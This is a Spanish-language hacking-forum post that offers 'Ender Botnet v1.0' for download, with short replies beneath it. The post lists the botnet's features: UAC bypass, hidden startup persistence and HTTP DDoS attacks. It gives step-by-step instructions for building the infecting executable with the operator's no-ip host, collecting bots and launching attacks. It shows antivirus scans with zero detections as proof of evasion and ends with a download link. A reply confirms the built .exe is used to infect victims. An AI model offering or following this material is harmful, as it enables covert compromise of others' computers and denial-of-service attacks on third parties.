Imagen del cliente:
(http://i.imgur.com/jdzXghT.png)
Imagen del Builder:
(http://i.imgur.com/VCJ5p4n.png)
¿Que es una botnet?
Botnet es un término que hace referencia a un conjunto o red de robots informáticos o bots, que se ejecutan de manera autónoma y automática.El artífice de la botnet puede controlar todos los ordenadores/servidores infectados de forma remota y se usan para diversas actividades criminales.
¿Que tiene esta botnet?
UAC Forcer
Builder para poner no-ip y puerto que deseen
Ataque HTTP
Inicio de Windows oculto de Msconfig
Copiado de archivos en Temp
Y lo más importante es que no hay problemas con las proactivas por ahora :dance2:
¿Como se usa?
1)Lo primero que hacen es abrir Ender Botnet v1.0.exe
2)Van a la parte donde dice Build Server y les aparecerá como lo siguiente:
(http://i.imgur.com/Y4kN5Il.png)
En el no-ip es obvio que se pone el No-ip o cualquier otro dns que utilicemos,tambien puede ser ip.
En puerto ponen el puerto que tengan abierto,es recomendable utilizar otro puerto que no usen para los troyanos.
Una vez ya completado le dan a crear botnet.
3)Abrimos de nuevo ender botnet y en la parte donde dice Puerto: ponemos el puerto que pusimos en el builder en mi caso es:556
(http://i.imgur.com/MEmxRT7.png)
4) Y por ultimo vamos a general - Empezar a escuchar y se les cargará los bots creo que no es muy complicado :laughing1:
5) Si realizaron los anteriores pasos correctamente les aparecerá asi:
(http://i.imgur.com/Un0BcVC.png)
6)¿Como se si esta haciendo el ataque ddos correspondiente? En la partede Status va a decir [HTTP - Attack Enabled].
(http://i.imgur.com/EfPYzAq.png)
7)Si seleccionaron el bot y le ponen STOP les aparecerá asi si se ejecuto el comando correctamente:
(http://i.imgur.com/mC4XF0h.png)
Bueno espero que les haya gustado,seguramente continué el proyecto y en la próxima versión le implemente ataque TCP y UDP.
Scan del servidor:
Filename: servidor.exe
Type: File
Filesize: 28672 bytes
Date: 17/09/2014 - 10:57 GMT+2
MD5: 08b995ae52e966bb584038edfaa4114e
SHA1: da3af60ff8d73589ce8a916876a4fffcfe710b2d
Status: Clean
Result: 0/35
AVG Free - OK
Avast - OK
AntiVir (Avira) - OK
BitDefender - OK
Clam Antivirus - OK
COMODO Internet Security - OK
Dr.Web - OK
eTrust-Vet - OK
F-PROT Antivirus - OK
F-Secure Internet Security - OK
G Data - OK
IKARUS Security - OK
Kaspersky Antivirus - OK
McAfee - OK
MS Security Essentials - OK
ESET NOD32 - OK
Norman - OK
Norton Antivirus - OK
Panda Security - OK
A-Squared - OK
Quick Heal Antivirus - OK
Solo Antivirus - OK
Sophos - OK
Trend Micro Internet Security - OK
VBA32 Antivirus - OK
Zoner AntiVirus - OK
Ad-Aware - OK
BullGuard - OK
FortiClient - OK
K7 Ultimate - OK
NANO Antivirus - OK
Panda CommandLine - OK
SUPERAntiSpyware - OK
Twister Antivirus - OK
VIPRE - OK
Scan Result: http://v2.scan.majyx.net/?page=results&sid=174160 (http://v2.scan.majyx.net/?page=results&sid=174160)
Scan by MaJyx Scanner (http://scan.majyx.net/)
Scan del servidor con mi noip:
Filename: servermodificado.exe
Type: File
Filesize: 28715 bytes
Date: 17/09/2014 - 10:41 GMT+2
MD5: 01ffc91ee2c9284a9291fb6c1e82fe4e
SHA1: 836d0098282da685ce8eb358e9516caa896f4c8e
Status: Clean
Result: 0/35
AVG Free - OK
Avast - OK
AntiVir (Avira) - OK
BitDefender - OK
Clam Antivirus - OK
COMODO Internet Security - OK
Dr.Web - OK
eTrust-Vet - OK
F-PROT Antivirus - OK
F-Secure Internet Security - OK
G Data - OK
IKARUS Security - OK
Kaspersky Antivirus - OK
McAfee - OK
MS Security Essentials - OK
ESET NOD32 - OK
Norman - OK
Norton Antivirus - OK
Panda Security - OK
A-Squared - OK
Quick Heal Antivirus - OK
Solo Antivirus - OK
Sophos - OK
Trend Micro Internet Security - OK
VBA32 Antivirus - OK
Zoner AntiVirus - OK
Ad-Aware - OK
BullGuard - OK
FortiClient - OK
K7 Ultimate - OK
NANO Antivirus - OK
Panda CommandLine - OK
SUPERAntiSpyware - OK
Twister Antivirus - OK
VIPRE - OK
Scan Result: http://v2.scan.majyx.net/?page=results&sid=174142 (http://v2.scan.majyx.net/?page=results&sid=174142)
Scan by MaJyx Scanner (http://scan.majyx.net/)
Creditos:
Uac Forcer (Slek)
Y a mi amigo Axtrax por ayudarme con el proyecto.
Link de descarga: http://ge.tt/api/1/files/4Cer5Jx1/0/blob?download
Autor: baku
Gracias por el aporte...me sumo a la pregunta.... ;)
Por favor iluminenos....
Saludos.
El server builder genera un .exe que es el que se usa para infectar.
Es igual que usar un troyano.
Saludos,
ANTRAX